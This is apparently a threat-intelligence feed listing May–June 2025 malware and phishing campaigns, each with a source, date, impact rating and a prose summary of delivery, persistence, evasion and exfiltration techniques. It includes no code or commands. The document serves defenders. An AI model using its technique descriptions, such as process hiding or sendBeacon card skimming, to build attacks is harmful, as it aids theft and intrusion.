- Researchers at ANY.RUN have found OtterCookie, a new JavaScript-based stealer malware attributed to the North Korean Lazarus Group, targeting finance and technology professionals. First observed in a campaign around June 2025, attackers employ social engineering, often through fake job offers or freelance bug fix tasks on platforms like LinkedIn, to deliver what appears to be legitimate Node.js code hosted in a Bitbucket repository. The malware's novelty lies in its execution method: an intentionally flawed piece of code triggers an error handler that fetches and executes a heavily obfuscated JavaScript payload from an external API, reportedly hosted in Finland.
AI_Tool_Misconfig_Exploited_for_Malicious_Payload
MEDIUM
+
—
- Intel Source:
- Sysdig
- Intel Name:
- AI_Tool_Misconfig_Exploited_for_Malicious_Payload
- Date of Scan:
- 2025-06-05
- Impact:
- MEDIUM
- Summary:
- The Sysdig Threat Research Team have reported an incident where a threat actor exploited a misconfigured, internet-exposed Open WebUI instance to deploy an AI-generated Python payload. This payload targeted both Linux and Windows systems, downloading T-Rex and XMRig cryptominers for Monero and Kawpow, establishing persistence via systemd services, and using a Discord webhook for C2. The financially motivated attack leveraged uncommon defense evasion tools like processhider and argvhider (an LD_PRELOAD technique to hide process arguments) on Linux. The Windows variant was more sophisticated, deploying a Java-based loader (application-ref.jar) which in turn executed secondary malicious JARs containing infostealers targeting Chrome extensions and Discord tokens, and employed multiple DLLs for XOR decoding and sandbox evasion.
HuluCaptcha_CAPTCHA_Deploys_Malware
LOW
+
—
- Intel Source:
- Gi7w0rm (Medium)
- Intel Name:
- HuluCaptcha_CAPTCHA_Deploys_Malware
- Date of Scan:
- 2025-06-04
- Impact:
- LOW
- Summary:
- Researchers from Gi7w0rm have uncovered a new malicious campaign called HuluCaptcha which uses fake CAPTCHA pages to distribute malware such as Lumma Stealer, Aurotun Stealer and Donut Injector. The attackers are compromising legitimate websites such as the German Association for International Law and the Los Angeles Caregiver Resource Center by injecting malicious JavaScript that redirects users to fake CAPTCHA screens designed to resemble Cloudflare. These deceptive pages trick users into executing malicious commands via the Windows Run dialog which installs malware. The campaign also includes tools for victim tracking, customized PowerShell payload generation and indications of an affiliate tracking system aimed at scaling the operation.
ViperSoftX_Targeting_Cryptocurrency_Users
LOW
+
—
- Intel Source:
- ASEC
- Intel Name:
- ViperSoftX_Targeting_Cryptocurrency_Users
- Date of Scan:
- 2025-06-03
- Impact:
- LOW
- Summary:
- ASEC researchers have observed the ViperSoftX threat actor targeting cryptocurrency users across the globe with recent attacks in Korea. This multi-stage malware campaign has been active for several years, aiming for financial gain by stealing cryptocurrency-related information and hijacking transactions. ViperSoftX gains initial access through pirated software or malicious torrents files. Once inside a system, it establishes persistence via scheduled tasks and obfuscated PowerShell scripts. The malware then deploys malicious tools including downloaders, information stealers like TesseractStealer, clipboard manipulators (ClipBanker) to change wallet addresses and RATs such as Quasar RAT and PureHVNC, communicating with C2 servers over HTTP and DNS. It can also monitor clipboard activity for cryptocurrency wallet addresses and BIP39 recovery phrases, exfiltrating browser data and system information and executing arbitrary commands from the attacker.
JINX_0132_DevOps_Cryptojacking_Campaign
LOW
+
—
- Intel Source:
- Wiz.io
- Intel Name:
- JINX_0132_DevOps_Cryptojacking_Campaign
- Date of Scan:
- 2025-06-03
- Impact:
- LOW
- Summary:
- Researchers at Wiz have identified a widespread cryptojacking campaign, attributed to the threat actor JINX-0132, targeting publicly accessible and misconfigured DevOps tools such as HashiCorp Nomad, Consul, Docker API, and Gitea, including instances in major cloud environments. Active as of June 2025, JINX-0132 exploits known vulnerabilities and insecure default settings—like Nomad's job creation or Consul's health checks—to achieve remote code execution and deploy the XMRig Monero miner for financial gain.
NightSpire_Ransomware
MEDIUM
+
—
- Intel Source:
- SOC Radar
- Intel Name:
- NightSpire_Ransomware
- Date of Scan:
- 2025-06-03
- Impact:
- MEDIUM
- Summary:
- Researchers from Soc Radar have uncovered a new financially motivated ransomware group called NightSpire that emerged in early 2025. The group employ a double extortion technique in which they steal sensitive data from victims and threaten to publish it on their data leak site if the ransom is not paid. NightSpire primarily targets small to medium-sized organisation including Technology, IT Services, Financial Services, Manufacturing, Construction, Education and Healthcare sectors across the U.S., Taiwan, Hong Kong, Egypt and several European nations. The group gain initial access by exploiting known vulnerabilities in VPNs, firewalls, or outdated web servers. Once inside, they use legitimate system tools such as PowerShell or PsExec to move laterally, steal credentials and escalate privileges. Before deploying ransomware, they exfiltrate data to attacker-controlled servers using tools like Rclone or MEGA. NightSpire leverages secure channels like ProtonMail or Telegram to communicates with victims.
APT_28_Targeting_Western_Logistics_and_Technology_Entities
MEDIUM
+
—
- Intel Source:
- CISA
- Intel Name:
- APT_28_Targeting_Western_Logistics_and_Technology_Entities
- Date of Scan:
- 2025-06-03
- Impact:
- MEDIUM
- Summary:
- A Joint advisory has been issued by CISA, NSA, FBI and international partners warns warns that the GRU’s Unit 26165 also known as APT28 or Fancy Bear has been conducting a long-running cyber espionage campaign targeting Western logistics and technology companies involved in the coordination, transport, and delivery of foreign assistance to Ukraine. The threat actor employs multiple tactics and technique to gain initial access including password spraying, spearphishing, exploiting vulnerabilities (like Outlook, Roundcube, and WinRAR) and abusing SOHO devices and VPNs. More recently, they have expanded their activity to include targeting internet-connected cameras at Ukraine and bordering NATO countries to monitor aid shipments. Once inside a system, the threat actor conduct reconnaissance and often use tools like Impacket, PsExec, Certipy, and ADExplorer for lateral movement and data exfiltration, focusing on sensitive information related to aid shipments.
Lazarus_Targeting_Crypto_via_Phishing
MEDIUM
+
—
- Intel Source:
- BitMEX
- Intel Name:
- Lazarus_Targeting_Crypto_via_Phishing
- Date of Scan:
- 2025-06-02
- Impact:
- MEDIUM
- Summary:
- BitMEX researchers have analyzed the Lazarus Group, linked to the North Korean government, continues its financially motivated campaigns against the cryptocurrency sector. Threat actors employ initial phishing and social engineering, such as recent LinkedIn pretexts for fake web3 project collaborations, to trick victims into executing malicious code often hosted in private GitHub repositories. This initial payload, as detailed by BitMEX, exfiltrates victim metadata to a misconfigured Supabase instance and deploys a second-stage JavaScript credential stealer, resembling "BeaverTail," aimed at pilfering browser data and cryptocurrency wallet access.
APT_C_53_Military_Themed_LNK_Attacks
MEDIUM
+
—
- Intel Source:
- 360 Threat Intelligence Center
- Intel Name:
- APT_C_53_Military_Themed_LNK_Attacks
- Date of Scan:
- 2025-06-02
- Impact:
- MEDIUM
- Summary:
- The 360 Advanced Threat Research Institute have recently captured VBScript samples attributed to APT-C-53 (Gamaredon), an advanced persistent threat group active since 2013 known for targeting government and military entities for intelligence theft. This campaign employs highly obfuscated VBS scripts and malicious LNK shortcut files, using military intelligence themes as bait to entice users into executing payloads via social engineering. The attackers utilize a phased deployment mechanism, achieving persistence through infected user files, registry modifications, and scheduled tasks, ultimately aiming to exfiltrate sensitive information. Forged HTTP request headers, including User-Agent and Referer fields referencing Ukrainian government domains, are used for command-and-control communication, which involves Base64 encoded data.
Lyrix_Ransomware_Targeting_Windows
MEDIUM
+
—
- Intel Source:
- CYFIRMA
- Intel Name:
- Lyrix_Ransomware_Targeting_Windows
- Date of Scan:
- 2025-06-02
- Impact:
- MEDIUM
- Summary:
- CYFIRMA researchers have identified Lyrix Ransomware, a Python-based malware compiled with PyInstaller, targeting Windows operating systems. First observed on April 20, 2025, Lyrix employs strong AES encryption, appends a '.02dq34jROu' extension to encrypted files, and utilizes advanced evasion techniques such as anti-VM checks (via VirtualProtect) and process manipulation (GetCurrentProcess, TerminateProcess). The financially motivated attackers issue ransom demands, threaten to leak stolen data from user directories like Downloads and Documents, and attempt to cripple system recovery by deleting Volume Shadow Copies and disabling WinRE. The malware's discovery on underground forums and the ProtonMail contact address creation in April 2025 indicate recent actor activity.
New_AsyncRAT_Campaign_Targets_Italian_Users
LOW
+
—
- Intel Source:
- CERT-AGID
- Intel Name:
- New_AsyncRAT_Campaign_Targets_Italian_Users
- Date of Scan:
- 2025-06-01
- Impact:
- LOW
- Summary:
- CERT-AGID researchers have uncovered a phishing campaign targeting users in Italy leveraging AsyncRAT malware. The attack starts with an English-language email impersonating the legitimate company Arabian Construction Co claiming the recipient is being considered as a potential supplier and invites them to view a file. However, Instead of an attachment, the email includes a Box.com link to download a TAR file containing a hidden JavaScript file. When executed, the script runs PowerShell to download a DLL from Aruba Drive. The DLL checks if it is running in a virtual machine then downloads and executes AsyncRAT. This malware allows attackers to take control of infected machines, steal data and run commands remotely.
DragonForce_Exploits_SimpleHelp_for_MSP_Attacks
MEDIUM
+
—
- Intel Source:
- Sophos
- Intel Name:
- DragonForce_Exploits_SimpleHelp_for_MSP_Attacks
- Date of Scan:
- 2025-06-01
- Impact:
- MEDIUM
- Summary:
- Sophos researchers have uncovered that DragonForce ransomware operators are exploiting a chain of vulnerabilities (CVE-2024-57727, CVE-2024-57728, and CVE-2024-57726) in SimpleHelp remote monitoring and management (RMM) software, released in January 2025. The attackers target Managed Service Providers (MSPs) to gain access to their environments and those of their clients. In one investigated case, the threat actors compromised an MSP’s SimpleHelp instance, mapped connected customer environments, and deployed DragonForce ransomware across multiple systems. They also exfiltrated sensitive data to enable double extortion tactics. Active since mid-2023, DragonForce operates as a Ransomware-as-a-Service (RaaS) platform with a growing affiliate base, including members linked to groups like Scattered Spider, presenting a serious supply chain threat to organizations reliant on MSPs.
Void_Blizzard_Espionage_Targets_Critical_Sectors
HIGH
+
—
- Intel Source:
- Microsoft
- Intel Name:
- Void_Blizzard_Espionage_Targets_Critical_Sectors
- Date of Scan:
- 2025-06-01
- Impact:
- HIGH
- Summary:
- Microsoft researchers have have disclosed details Void Blizzard (also LAUNDRY BEAR), a Russia-affiliated actor active since at least April 2024, conducting cyberespionage operations against organizations crucial to Russian government objectives, primarily in Europe and North America. Targets include government, defense, transportation, media, NGOs, and healthcare sectors, with a disproportionate focus on NATO member states and Ukraine. Void Blizzard initially gained access by using stolen credentials, likely procured from infostealer ecosystems, to access Exchange and SharePoint Online for large-scale email and file exfiltration. As of April 2025, the actor evolved tactics to include adversary-in-the-middle (AitM) spear phishing, using typosquatted domains and the Evilginx framework to spoof Microsoft Entra authentication and steal credentials and session cookies.
MSHTA_LOLBin_Delivers_Obfuscated_Infostealer
MEDIUM
+
—
- Intel Source:
- LevelBlue
- Intel Name:
- MSHTA_LOLBin_Delivers_Obfuscated_Infostealer
- Date of Scan:
- 2025-05-31
- Impact:
- MEDIUM
- Summary:
- According to LevelBlue's analysis, published May 27, 2025, details an emerging threat involving multi-stage malware delivery initiated by mshta.exe, a native Windows LOLBin. Attackers leverage MSHTA to fetch an initially disguised .tmp file, hosted on cloud infrastructure like Alibaba Cloud Object Storage, which contains heavily obfuscated VBScript. This script employs techniques like XOR and Base64 encoding to deobfuscate and execute subsequent PowerShell payloads via WMI, ultimately leading to the deployment of a sophisticated infostealer.
Fake_Agenzia_Entrate_Refund_Scam
LOW
+
—
- Intel Source:
- CERT-AGID
- Intel Name:
- Fake_Agenzia_Entrate_Refund_Scam
- Date of Scan:
- 2025-05-31
- Impact:
- LOW
- Summary:
- CERT-AGID researchers have uncovered a phishing campaign impersonating Italy’s Revenue Agency (Agenzia delle Entrate), in which threat actors distribute fake refund emails to trick recipients into entering personal and credit card information on a fraudulent website. The Ministry of Economy and Finance (MEF) has been notified, and efforts are underway to take down the malicious domain.
Stealthy_WooCommerce_Formjacking_Malware
LOW
+
—
- Intel Source:
- Wordfence
- Intel Name:
- Stealthy_WooCommerce_Formjacking_Malware
- Date of Scan:
- 2025-05-31
- Impact:
- LOW
- Summary:
- The Wordfence researchers have identified a sophisticated formjacking malware targeting e-commerce sites using WooCommerce. Active since at least April 2025, this malware injects a convincing, fake payment form into the checkout process to steal sensitive customer data, including full card details and personal information. Attackers achieve initial access likely through compromised WordPress administrator accounts, then inject the malicious JavaScript via custom code plugins. The malware stealthily captures data by continuously monitoring billing fields and storing it in the browser's localStorage for persistence across sessions and resilience against network interruptions. Upon the customer clicking "Place Order," the script exfiltrates the collected data to a remote command-and-control server using the navigator.sendBeacon() method, which avoids user awareness and common detection triggers.
Mimo_Exploits_Craft_CMS_for_Cryptomining
LOW
+
—
- Intel Source:
- Sekoia
- Intel Name:
- Mimo_Exploits_Craft_CMS_for_Cryptomining
- Date of Scan:
- 2025-05-30
- Impact:
- LOW
- Summary:
- Researchers at Sekoia have identified a group called Mimo that has been active since at least March 2022, exploiting a newly disclosed vulnerability (CVE-2025-32432) in the Craft content management system to break into servers. After gaining access, the attackers, believed to be based in Turkey install a backdoor that allows remote access to a compromised server and run a script named 4l4md4r.sh to download a program written in Go language. This program installs both a cryptominers called XMRig and a tool called IPRoyal, used to exploit the victim's internet bandwidth. They also use advanced techniques like LD_PRELOAD hijacking which helps hide their malicious activity on the system.
ALCATRAZ_Obfuscated_DOUBLELOADER_Backdoor
MEDIUM
+
—
- Intel Source:
- Elastic Security Labs
- Intel Name:
- ALCATRAZ_Obfuscated_DOUBLELOADER_Backdoor
- Date of Scan:
- 2025-05-30
- Impact:
- MEDIUM
- Summary:
- Researchers from Elastic Security Labs have discovered DOUBLELOADER, a newly identified backdoor malware often found in conjunction with the RHADAMANTHYS infostealer. This malware duo is notably protected by the ALCATRAZ open-source obfuscator, which has been in use since January 2023 by both cybercriminal groups and APT actors. DOUBLELOADER has been active since at least December 2024 and leverages ALCATRAZ to complicate binary analysis and extend its operational lifespan. DOUBLELOADER performs direct system calls for tasks such as injecting code into the explorer.exe process, gathering host system information, and communicating with a hardcoded command-and-control server for updates. The ALCATRAZ obfuscator enhances evasion by applying multiple layers of protection, including control flow flattening, instruction mutation, constant unfolding, LEA constant hiding, anti-disassembly techniques, and entrypoint obfuscation. These obfuscation methods are frequently embedded within a custom PE section named .0Dev.
Fancy_Bear_SpyPress_XSS_Campaign
MEDIUM
+
—
- Intel Source:
- PolySwarm
- Intel Name:
- Fancy_Bear_SpyPress_XSS_Campaign
- Date of Scan:
- 2025-05-30
- Impact:
- MEDIUM
- Summary:
- PolySwarm researchers have uncovered Operation RoundPress, an ongoing cyberespionage campaign attributed to the Russia-aligned threat group Fancy Bear, active since 2023 and expanding through 2024. The operation leverages SpyPress, a malicious JavaScript payload delivered through spearphishing emails that exploit cross-site scripting (XSS) vulnerabilities, including zero-days like CVE-2024-11182 in MDaemon—within webmail platforms such as Roundcube, Horde, and Zimbra. The campaign primarily targets Ukrainian government agencies, Eastern European defense contractors, and government organizations across Africa, the EU, and South America.
Leverage_Maha_Grass_Tools_via_Brain_Worm_Infra
MEDIUM
+
—
- Intel Source:
- Qianxin Threat Intelligence Center
- Intel Name:
- Leverage_Maha_Grass_Tools_via_Brain_Worm_Infra
- Date of Scan:
- 2025-05-30
- Impact:
- MEDIUM
- Summary:
- Researchers at Qianxin have uncovered substantial overlaps in infrastructure and tooling between two advanced persistent threat (APT) groups: Maha Grass (APT-Q-36) and Brain Worm (APT-Q-38). Both groups are active in cyber espionage operations targeting organizations across South Asia and the broader Asian region. Since late February 2025, Brain Worm has been observed using a malware-hosting domain that was also recently associated with a Spyder downloader variant deployed by Maha Grass. A notable connection between the two groups is the use of the same digital signature "Ebo Sky Tech Inc" on malware samples, but applied on different dates: January 28 for Brain Worm and February 16 for Maha Grass. Both groups rely on spear-phishing attacks using malicious PowerPoint files embedded with VBA macros. These macros deliver an initial payload that subsequently downloads additional components, including DLL files and the Spyder downloader. The Spyder variant employed by both APTs features XOR-encrypted configurations, establishes persistence via scheduled tasks, remaps system DLLs, and exfiltrates data using Base64-encoded JSON payloads embedded in custom HTTP headers. To evade detection, the malware disguises its command-and-control (C2) traffic as legitimate network communication, spoofing well-known services such as GitHub.
Danabot_MaaS_Disruption_and_Analysis
MEDIUM
+
—
- Intel Source:
- ESET Research
- Intel Name:
- Danabot_MaaS_Disruption_and_Analysis
- Date of Scan:
- 2025-05-29
- Impact:
- MEDIUM
- Summary:
- According to ESET Research, the Danabot Malware-as-a-Service (MaaS) operation, an infostealer and banking trojan active since 2018, recently disrupted by a multinational law enforcement effort, Operation Endgame, in May 2025. The Danabot group, including individuals identified as JimmBee and Onix, provided affiliates with tools to steal financial data, deploy secondary malware like ransomware, and conduct DDoS attacks against global victims, with early campaigns targeting Australia and Poland. Attackers distributed Danabot via spam, malicious Google Ads, and deceptive websites tricking users into executing malware on Windows systems.
Operation_Endgame_2_0
MEDIUM
+
—
- Intel Source:
- Zscaler
- Intel Name:
- Operation_Endgame_2_0
- Date of Scan:
- 2025-05-29
- Impact:
- MEDIUM
- Summary:
- Zscaler researchers have observed that law enforcement agencies have released information about an ongoing coordinated effort under “Operation Endgame”, a Joint campaign aimed at seizing and taking down DanaBot infrastructure, primarily within the United States. This operations has already disrupted several malware families like SmokeLoader, IcedID, Pikabot, and Bumblebee, and now includes actions against DanaBot. It is sold on underground forums as a Malware-as-a-Service (MaaS). Its primary functions include stealing sensitive data, injecting malicious content into web browsers and deploying additional malware such as ransomware and remote access trojans. Notably, DanaBot can capture keystrokes, take screenshots, record the screen, and even access the victim’s system remotely. DanaBot's communications with C2 servers use strong encryption and utilize Tor to anonymize and secure these connections.
Chihuahua_Infostealer
LOW
+
—
- Intel Source:
- Picussecurity
- Intel Name:
- Chihuahua_Infostealer
- Date of Scan:
- 2025-05-29
- Impact:
- LOW
- Summary:
- Researchers at Picus Security have uncovered a .NET-based malware called Chihuahua Infostealer which emerged in April 2025 and targets browser credentials and cryptocurrency wallet data. The malware, likely created by Russian-speaking developers begins with social engineering that tricks victims into executing a malicious PowerShell script often delivered through trusted platforms like Google Drive. This script starts a multi-stage infection chain involving a Base64-encoded payload, followed by second-stage script that sets up scheduled task for persistence and further payload execution. The final .NET payload downloaded from OneDrive which runs directly in memory to evade detection. The infection chain steal data from various browsers and cryptocurrency wallet. The stolen data is encrypted and exfiltrated over HTTPS, while local evidence of the attack is erased.
Chinese_Threat_Actor_Exploiting_Ivanti_EMM_Vulnerability
MEDIUM
+
—
- Intel Source:
- EclecticIQ
- Intel Name:
- Chinese_Threat_Actor_Exploiting_Ivanti_EMM_Vulnerability
- Date of Scan:
- 2025-05-28
- Impact:
- MEDIUM
- Summary:
- EclecticIQ researcher have identified that China-nexus threat actor called UNC5221 is actively exploiting two critical Ivanti Endpoint Manager Mobile (EPMM) vulnerabilities (CVE-2025-4427 and CVE-2025-4428). The attackers are targeting internet-facing EPMM systems across critical sectors in Europe, North America, and the Asia-Pacific. They gain initial access through an unauthenticated remote code execution using Java Reflection to execute commands. Post-exploitation, they deploy the KrustyLoader malware which downloads a hidden second-stage payload from AWS storage. This malware decrypts and injects itself directly into system memory to maintain long-term access. The threat actors then leverage MySQL credentials to access the EPMM database and exfiltrating sensitive data including authentication credentials, device details and Office 365 tokens. They also use a tool called FRP (Fast Reverse Proxy) for network reconnaissance and lateral movement.
TAG_110_Targets_Tajikistan_Entities
MEDIUM
+
—
- Intel Source:
- Recorded Future
- Intel Name:
- TAG_110_Targets_Tajikistan_Entities
- Date of Scan:
- 2025-05-28
- Impact:
- MEDIUM
- Summary:
- Researchers at Insikt group has uncovered a phishing campaign conducted by Russian threat actor TAG-110, targeting government, educational, and research institutions in Tajikistan. In this campaign, threat actor has changed tactics by leveraging macro-enabled Word template files (.dotm) to gain initial access and persistence insteal of deploying HTA-based payload named HATVIBE. These VBA enabled templates are embedded within government themed documents. When receiptent open the document, the malware copies itself to the Word STARTUP folder, allowing it to run automatically every time Word is opened. It collects system information and send it to C2 server. This campaign focused on intelligence gathering related to government operations, military affairs, and political events such as elections to support Russian strategic interests in Central Asia.
Operation_Sindoor
LOW
+
—
- Intel Source:
- Seqrite
- Intel Name:
- Operation_Sindoor
- Date of Scan:
- 2025-05-28
- Impact:
- LOW
- Summary:
- Researchers from Seqrite Labs have uncovered multiple cyber attack linked to Operation Sindoor, involving both State sponsored group and hacktivist group. The campaign is associated with Pakistan-aligned threat groups APT36 and Sidecopy and targeted critical Indian sectors such as defense, government IT systems, healthcare, telecom, and education. It involved spear phishing with malicious documents (macros, shortcuts, scripts) that deployed the Ares malware for espionage while hacktivist groups launched DDoS attacks, defaced websites, and leaked stolen data. The operation also leveraged spoofed domains mimicking military and government entities to spread false information and cause disruption.
APT_Spear_Phishing_Surge_in_Korea
LOW
+
—
- Intel Source:
- ASEC
- Intel Name:
- APT_Spear_Phishing_Surge_in_Korea
- Date of Scan:
- 2025-05-27
- Impact:
- LOW
- Summary:
- ASEC researchers have discovered an increase in Advanced Persistent Threat (APT) attacks in South Korea during April 2025, with spear phishing identified as the most common infiltration method. Targeted phishing attacks use thorough reconnaissance, spoofed sender addresses, and malware attachments or links to trick receivers. AhnLab identified a particular variation involving LNK files, in which attackers distributed CAB-compressed malicious scripts encoded in LNK files carrying PowerShell commands. When launched, these scripts can extract fake documents, leak system information, and install other malware on the victim's computer.
Amos_Stealer_Targeting_macOS_Users
LOW
+
—
- Intel Source:
- motuariki (X)
- Intel Name:
- Amos_Stealer_Targeting_macOS_Users
- Date of Scan:
- 2025-05-27
- Impact:
- LOW
- Summary:
- Security researcher motuariki have disclosed additional Command and Control (C2) infrastructure and sample hashes associated with the Amos Stealer, a known macOS malware. The shared C2 endpoint was listed alongside other similar IP-based C2s. This ongoing activity signifies a persistent threat from Amos Stealer targeting macOS users for credential and data theft.
Bumblebee_Spread_via_Bing_SEO_Poisoning
MEDIUM
+
—
- Intel Source:
- CYJAX
- Intel Name:
- Bumblebee_Spread_via_Bing_SEO_Poisoning
- Date of Scan:
- 2025-05-26
- Impact:
- MEDIUM
- Summary:
- Cyjax researchers have identified a new Bumblebee malware distribution campaign that exploits Bing SEO poisoning. The attackers target users searching for software like WinMTR and Milestone XProtect by creating fake download sites. These sites, hosted on a Truehost Cloud server in Nairobi, rank highly in Bing search results and deliver trojanized MSI installers from an external domain. When executed via msiexec.exe, the installer drops both legitimate software components and malicious files, including a tampered version.dll and icardagt.exe. The executable loads the malicious DLL, leading to the deployment of the Bumblebee malware. Once active, Bumblebee connects to command-and-control (C2) domains using unique 13-character strings followed by a .life TLD. The campaign appears to be an evolution of a similar 2023 SEO poisoning strategy and is now focused on targeting less mainstream software tools often used in technical development environments.
ViciousTrap_Edge_Device_Honeypot_Network
LOW
+
—
- Intel Source:
- Sekoia
- Intel Name:
- ViciousTrap_Edge_Device_Honeypot_Network
- Date of Scan:
- 2025-05-26
- Impact:
- LOW
- Summary:
- Researchers from Sekoia have identified ViciousTrap, an actor compromising over 5,500 edge devices globally since March 2025, primarily in Asia, to create a distributed honeypot network. Likely Chinese-speaking, ViciousTrap exploits vulnerabilities like CVE-2023-20118 in devices from over 50 brands, using a script (NetGhost) to redirect traffic from compromised systems to its Malaysian-based interception servers, enabling Man-in-the-Middle data collection on various monitored assets, including some in Taiwan and the US.
Phishing_Campaign_Abuses_jsDelivr
LOW
+
—
- Intel Source:
- Fortra
- Intel Name:
- Phishing_Campaign_Abuses_jsDelivr
- Date of Scan:
- 2025-05-26
- Impact:
- LOW
- Summary:
- Researchers at Fortra have identified a phishing campaign targeting Microsoft O365 users. The attack initiate with the phishing email containing .htm file that hides encrypted JavaScript code using AES encryption. Once decrypted, the script connects to a fake open-source package on npm which is hosted on a CDN like jsDelivr. This package then generates customized phishing links that include victim’s email address. These links redirect the victim through multiple websites before landing on a fake office 365 login page to steal their credentials.
MUT_9332_Targets_Solidity_Developers
MEDIUM
+
—
- Intel Source:
- Datadog
- Intel Name:
- MUT_9332_Targets_Solidity_Developers
- Date of Scan:
- 2025-05-25
- Impact:
- MEDIUM
- Summary:
- Datadog researchers have uncovered a campaign by the threat actor MUT-9332 targeting Solidity developers on Windows systems. The attackers leveraged deceptive VS code extensions that appeared legitimate but secretly ran malicious code in the backgroud. These malicious extensions, discovered between April and May 2025 before being removed from the Marketplace, initiated multi-stage infection chains involving obfuscated JavaScript, PowerShell scripts and steganography to hide payloads within image files. Their primary goal was to steal sensitive information such as cryptocurrency wallet credentials and system information and deploy a remote access tool called Quasar RAT to give the attackers control over the victim’s system.
PureRAT_Spam_Attacks_in_Russia
LOW
+
—
- Intel Source:
- Securelist
- Intel Name:
- PureRAT_Spam_Attacks_in_Russia
- Date of Scan:
- 2025-05-25
- Impact:
- LOW
- Summary:
- Securelist researchers discovered an increase in attacks against Russian enterprises utilizing the Pure malware family, specifically PureRAT and PureLogs. This campaign has been active since March 2023, and it experienced a fourfold growth in early 2025 compared to the same period in 2024. The campaign, which is distributed via spam emails containing malicious RAR files or links, deceives users by using accounting-related file names and double extensions such as.pdf.rar.
Fake_Zoom_Invites_Steal_Credentials
LOW
+
—
- Intel Source:
- Spider Labs
- Intel Name:
- Fake_Zoom_Invites_Steal_Credentials
- Date of Scan:
- 2025-05-24
- Impact:
- LOW
- Summary:
- SpiderLabs researchers have identified a phishing campaign targeting corporate users with fake Zoom meeting invitations designed to steal login credentials. The attackers leverage urgent and legitimate looking emails to lure recipients into clicking malicious links. These links leads to deceptive Zoom pages that include pre-recorded videos making it appears as live meeting is in progress but after a fake disconnection message, it asks users to enter their credentials on a fake screen. Once entered, the stolen information is immediately sent to the attackers through Telegram. The primary objective of this campaign is to steal login credentials which could lead to account takeovers.
W3LL_Phishing_Kit_Hits_Outlook_Users
MEDIUM
+
—
- Intel Source:
- Hunt.IO
- Intel Name:
- W3LL_Phishing_Kit_Hits_Outlook_Users
- Date of Scan:
- 2025-05-23
- Impact:
- MEDIUM
- Summary:
- Researchers from Hunt.IO have discovered a phishing campaign leveraging the W3LL Phishing Kit to target Microsoft Outlook credentials. This Phishing-as-a-Service (PaaS) tool, initially identified by Group-IB in 2022 and available through the W3LL Store marketplace, enables attackers to conduct adversary-in-the-middle (AiTM) attacks to hijack session cookies and bypass multi-factor authentication. The observed campaign utilized an open directory on IP address to host W3LL phishing kit components, including IonCube obfuscated PHP files in folders named "OV6". The phishing lure involved a fake Adobe Shared File service webpage that, upon attempted login, sent credentials via a POST request, specifically to a /wazzy.php endpoint.
PyBitmessage_Backdoor_Malware
LOW
+
—
- Intel Source:
- ASEC
- Intel Name:
- PyBitmessage_Backdoor_Malware
- Date of Scan:
- 2025-05-23
- Impact:
- LOW
- Summary:
- ASEC researchers have identified a hidden backdoor that installs alongside a Monero cryptocurrency miner which leverages the PyBitmessage library for C2 communications. The initial malware decrypts and deploys both the coinminer and a filess PowerShell based backdoor that executes directly in memory and downloads additional malicious tools from Github or Russian file hosting services. The attacker’s primary motive is to exploit compromised system for cryptocurrency mining while establishing persistent access through the backdoor for potential further attacks.
TA406_Targeting_Government_Entities_in_Ukraine
MEDIUM
+
—
- Intel Source:
- Proofpoint
- Intel Name:
- TA406_Targeting_Government_Entities_in_Ukraine
- Date of Scan:
- 2025-05-23
- Impact:
- MEDIUM
- Summary:
- Researchers from ProofPoint have uncovered a phishing campaigns run by DPRK state-sponsored actor TA406 also known as Opal Sleet and Konni targeting government entities in Ukraine. The campaigns focus on credential harvesting and malware deployment to collect intelligence related to the ongoing Russian invasion. The attackers impersonate members of think tank and send fake Microsoft security alerts to trick people into opening malicious files in HTML, CHM, ZIP or LNK formats. These files execute hidden PowerShell script that gathers host data, establishes persistence via autorun batch files and send the data to servers controlled by the attackers.
Tycoon2FA_Phishing_Using_Malformed_URLs
MEDIUM
+
—
- Intel Source:
- SpiderLabs
- Intel Name:
- Tycoon2FA_Phishing_Using_Malformed_URLs
- Date of Scan:
- 2025-05-22
- Impact:
- MEDIUM
- Summary:
- SpiderLabs researchers have identified that Tycoon2FA-linked phishing campaigns are targeting Microsoft 365 users. These campaigns leverage malformed URLs containing backslash characters (https:\\) instead of forward slashes. Despite this unconventional formatting, most web browsers still resolve these links, leading unsuspecting victims to credential harvesting pages. This technique is employed by threat actors to bypass email security filters and evade URL-based detection systems, ultimately aiming to steal Microsoft 365 credentials. The infrastructure observed involves domains hosted on services like Azure and Cloudflare Workers.
SEO_Poisoning_Infostealer_Trends
LOW
+
—
- Intel Source:
- ASEC
- Intel Name:
- SEO_Poisoning_Infostealer_Trends
- Date of Scan:
- 2025-05-22
- Impact:
- LOW
- Summary:
- Researchers at ASEC have identified ongoing trends in Infostealer malware spread throughout April 2025, focusing on the continued use of crack and keygen disguises to entice victims. These threats, typically promoted by SEO poisoning to appear at the top of search results, included well-known Infostealers such as LummaC2, Vidar, and StealC.
AutoIT_Based_AsyncRAT_Delivery_Chain
LOW
+
—
- Intel Source:
- ISC.SANS
- Intel Name:
- AutoIT_Based_AsyncRAT_Delivery_Chain
- Date of Scan:
- 2025-05-22
- Impact:
- LOW
- Summary:
- Researchers at ISC.SANS have found a malware campaign that delivers a RAT through a dual-layer AutoIT script framework. The first executable downloads an AutoIT interpreter and a second obfuscated AutoIT script that decodes and executes commands using a custom Wales() function. Persistence is enabled using a custom shortcut in the Startup folder that runs JavaScript and initiates further execution. The final payload, injected into a jsc.exe process as a DLL called Urshqbgpm.dll, attempts to communicate with a known AsyncRAT C2 server and includes references to PureHVNC functionality.
Confluence_Hit_by_ELPACO_Ransomware
MEDIUM
+
—
- Intel Source:
- The DFIR Report
- Intel Name:
- Confluence_Hit_by_ELPACO_Ransomware
- Date of Scan:
- 2025-05-22
- Impact:
- MEDIUM
- Summary:
- The DFIR Report researchers have observed that an unpatched, internet-facing Confluence server was compromised via CVE-2023-22527, leading to the deployment of ELPACO-team ransomware (a Mimic variant) approximately 62 hours later. The threat actor initially used the exploit to deploy a Metasploit payload and establish C2 via IP. Following initial access, the actor performed privilege escalation using RPCSS named pipe impersonation, created a local administrator account ("noname"), and installed AnyDesk for persistent remote access via a self-hosted server. Extensive discovery, including network scanning with SoftPerfect NetScan and attempted Zerologon exploitation, preceded credential harvesting using Mimikatz and Impacket's Secretsdump. Lateral movement was achieved using the compromised domain administrator credentials via Impacket wmiexec and RDP.
Koishi_Chatbot_Plugin_Steals_Messages
LOW
+
—
- Intel Source:
- Socket
- Intel Name:
- Koishi_Chatbot_Plugin_Steals_Messages
- Date of Scan:
- 2025-05-22
- Impact:
- LOW
- Summary:
